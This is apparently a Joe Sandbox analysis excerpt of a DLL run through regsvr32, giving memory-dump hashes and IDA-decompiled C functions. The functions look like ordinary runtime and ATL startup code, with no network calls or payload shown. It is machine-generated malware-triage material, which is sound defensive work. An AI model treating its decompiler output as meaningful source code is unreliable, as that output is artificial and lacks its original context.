    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 153a9780aa78d4a878e3d88310d67691e8d57e45ee6b3cf9399a033d7d4fad8e
    • Instruction ID: 73cd7b2f01f144926092212072c7ef0c3c0a2de06b571222c8015f9ec2949b6c
    • Opcode Fuzzy Hash: 153a9780aa78d4a878e3d88310d67691e8d57e45ee6b3cf9399a033d7d4fad8e
    • Instruction Fuzzy Hash: 1BE04F77809A28EB8F929F5886044453FB7E78673830109C6EC000A361E7B94073DBC2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E6F84C978(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t26;
    				intOrPtr* _t36;
    				signed int _t37;
    				signed int _t40;
    				char _t42;
    				signed int _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				intOrPtr _t48;
    				signed int _t49;
    				signed int _t54;
    				void* _t57;
    				intOrPtr* _t58;
    				signed int _t64;
    				signed int _t66;
    
    				_t57 = __edx;
    				_t48 = _a4;
    				if(_t48 != 0) {
    					__eflags = _t48 - 2;
    					if(_t48 == 2) {
    						L5:
    						E6F84F8D2(_t48);
    						E6F84F319(_t48, _t57, 0, 0x6f85d430, 0, 0x6f85d430, 0x104);
    						_t26 =  *0x6f85d9d0; // 0x2f53288
    						 *0x6f85d9c0 = 0x6f85d430;
    						_v20 = _t26;
    						__eflags = _t26;
    						if(_t26 == 0) {
    							L7:
    							_t26 = 0x6f85d430;
    							_v20 = 0x6f85d430;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t64 = E6F84CC22(E6F84CAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
    							__eflags = _t64;
    							if(__eflags != 0) {
    								E6F84CAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t48 - 1;
    								if(_t48 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t49 = E6F84F20C(_t64, _t64);
    									__eflags = _t49;
    									if(_t49 == 0) {
    										_t58 = _v12;
    										_t54 = 0;
    										_t36 = _t58;
    										__eflags =  *_t58;
    										if( *_t58 == 0) {
    											L17:
    											_t37 = 0;
    											 *0x6f85d9c4 = _t54;
    											_v12 = 0;
    											_t49 = 0;
    											 *0x6f85d9c8 = _t58;
    											L18:
    											E6F84DC0E(_t37);
    											_v12 = 0;
    											L19:
    											E6F84DC0E(_t64);
    											_t40 = _t49;
    											L20:
    											return _t40;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t36 = _t36 + 4;
    											_t54 = _t54 + 1;
    											__eflags =  *_t36;
    										} while ( *_t36 != 0);
    										goto L17;
    									}
    									_t37 = _v12;
    									goto L18;
    								}
    								_t42 = _v8 - 1;
    								__eflags = _t42;
    								 *0x6f85d9c4 = _t42;
    								_t43 = _t64;
    								_t64 = 0;
    								 *0x6f85d9c8 = _t43;
    								L12:
    								_t49 = 0;
    								goto L19;
    							}
    							_t44 = E6F84D46D(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t44 = 0;
    							goto L12;
    						}
    						__eflags =  *_t26;
    						if( *_t26 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t48 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t45 = E6F84D46D(__eflags);
    					_t66 = 0x16;
    					 *_t45 = _t66;
    					E6F84C24F();
    					_t40 = _t66;
    					goto L20;
    				}
    				return 0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\regsvr32.exe
    • API String ID: 0-3922119987
    • Opcode ID: a643c05b8750da4d102535eaec035b1dfac236082660cb7598d07ee5d718654e
    • Instruction ID: a71069dc610b8636272bdcd76615ae4bb212ee0b56ec3f5ac59ede5891cf2eff
    • Opcode Fuzzy Hash: a643c05b8750da4d102535eaec035b1dfac236082660cb7598d07ee5d718654e
    • Instruction Fuzzy Hash: 8241BFB2A0421CBFDB15CBADD98599EBBFDEF86310B0008E6E400DF241E7709A55C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E6F84B475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				void* _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				intOrPtr _v56;
    				void _v60;
    				signed char* _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t75;
    				char _t76;
    				signed char _t78;
    				signed int _t80;
    				signed char* _t81;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr* _t87;
    				void* _t90;
    				signed char* _t93;
    				intOrPtr* _t96;
    				signed char _t97;
    				intOrPtr _t98;
    				intOrPtr _t99;
    				intOrPtr* _t101;
    				signed int _t102;
    				signed int _t103;
    				signed char _t108;
    				signed char* _t111;
    				signed int _t112;
    				void* _t113;
    				signed char* _t116;
    				void* _t121;
    				signed int _t123;
    				void* _t130;
    				void* _t131;
    
    				_t110 = __edx;
    				_t100 = __ecx;
    				_t96 = _a4;
    				if( *_t96 == 0x80000003) {
    					return _t74;
    				} else {
    					_push(_t121);
    					_push(_t113);
    					_t75 = E6F84AD86(_t96, __ecx, __edx, _t113, _t121);
    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
    						__imp__EncodePointer(0);
    						_t121 = _t75;
    						if( *((intOrPtr*)(E6F84AD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
    							_t87 = E6F84A645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
    							_t130 = _t130 + 0x1c;
    							if(_t87 != 0) {
    								L16:
    								return _t87;
    							}
    						}
    					}
    					_t76 = _a20;
    					_v24 = _t76;
    					_v20 = 0;
    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
    						_push(_a28);
    						E6F84A578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
    						_t112 = _v36;
    						_t131 = _t130 + 0x18;
    						_t87 = _v40;
    						_v16 = _t87;
    						_v8 = _t112;
    						if(_t112 < _v28) {
    							_t102 = _t112 * 0x14;
    							_v12 = _t102;
    							do {
    								_t103 = 5;
    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
    								_t131 = _t131 + 0xc;
    								if(_v60 <= _t90 && _t90 <= _v56) {
    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
    									_t108 = _t93[4];
    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
    										if(( *_t93 & 0x00000040) == 0) {
    											_push(0);
    											_push(1);
    											E6F84B04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
    											_t112 = _v8;
    											_t131 = _t131 + 0x30;
    										}
    									}
    								}
    								_t112 = _t112 + 1;
    								_t87 = _v16;
    								_t102 = _v12 + 0x14;
    								_v8 = _t112;
    								_v12 = _t102;
    							} while (_t112 < _v28);
    						}
    						goto L16;
    					}
    					E6F84D547(_t96, _t100, _t110, 0, _t121);
    					asm("int3");
    					_t111 = _v68;
    					_push(_t96);
    					_push(_t121);
    					_push(0);
    					_t78 = _t111[4];
    					if(_t78 == 0) {
    						L41:
    						_t80 = 1;
    					} else {
    						_t101 = _t78 + 8;
    						if( *_t101 == 0) {
    							goto L41;
    						} else {
    							_t116 = _a4;
    							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
    								_t97 = _t116[4];
    								_t123 = 0;
    								if(_t78 == _t97) {
    									L33:
    									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
    										_t81 = _a8;
    										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
    											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
    												_t123 = 1;
    											}
    										}
    									}
    									_t80 = _t123;
    								} else {
    									_t59 = _t97 + 8; // 0x6e
    									_t82 = _t59;
    									while(1) {
    										_t98 =  *_t101;
    										if(_t98 !=  *_t82) {
    											break;
    										}
    										if(_t98 == 0) {
    											L29:
    											_t83 = _t123;
    										} else {
    											_t99 =  *((intOrPtr*)(_t101 + 1));
    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
    												break;
    											} else {
    												_t101 = _t101 + 2;
    												_t82 = _t82 + 2;
    												if(_t99 != 0) {
    													continue;
    												} else {
    													goto L29;
    												}
    											}
    										}
    										L31:
    										if(_t83 == 0) {
    											goto L33;
    										} else {
    											_t80 = 0;
    										}
    										goto L42;
    									}
    									asm("sbb eax, eax");
    									_t83 = _t82 | 0x00000001;
    									goto L31;
    								}
    							} else {
    								goto L41;
    							}
    						}
    					}
    					L42:
    					return _t80;
    				}
    			}

    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F84B49A
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: EncodePointer
    • String ID: MOC$RCC
    • API String ID: 2118026453-2084237596
    • Opcode ID: 99e51bf46c138598f287a30d65294e4a67ee3e8b6052dab195e826350155e951
    • Instruction ID: c491a8ed4553eb1c9bdc66435360b112155051d9fad3513d9ae3b78906806f45
    • Opcode Fuzzy Hash: 99e51bf46c138598f287a30d65294e4a67ee3e8b6052dab195e826350155e951
    • Instruction Fuzzy Hash: 0F41297190020DAFCF09CF98CD81AEEBBB5FF48314F158899EA246A251D335E961DB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F849CF7(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E6F849D4A(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0x6f840000;
    				 *((intOrPtr*)(__ecx + 4)) = 0x6f840000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0x6f8553dc;
    				if(E6F845D50(__ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0x6f85cb28 = 1;
    				}
    				return _t13;
    			}





    APIs
      • Part of subcall function 6F845D50: GetLastError.KERNEL32(?,?,?,6F85A66C), ref: 6F845D74
    • IsDebuggerPresent.KERNEL32(?,?,6F85A66C,?,?,?,?,?,?,?,00000000,?,6F8546B0,000000FF,?,6F841E0A), ref: 6F849D2A
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6F85A66C,?,?,?,?,?,?,?,00000000,?,6F8546B0,000000FF), ref: 6F849D39
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6F849D34
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: DebugDebuggerErrorLastOutputPresentString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 389471666-631824599
    • Opcode ID: c5b8c58cbdac253f88d8ee254b9d9b4d2a9a60d6e1ccec2e64bc0e1801d27457
    • Instruction ID: 2d4919269dd02dfef153cf0861c369a07b01a2371080effb5e8c89fa9f3a7bbe
    • Opcode Fuzzy Hash: c5b8c58cbdac253f88d8ee254b9d9b4d2a9a60d6e1ccec2e64bc0e1801d27457
    • Instruction Fuzzy Hash: DAE039701007048BDBB48F2CD504386BAE0AF06228F408CEDD45ACE244E7B9A098CB91
    Uniqueness

    Uniqueness Score: -1.00%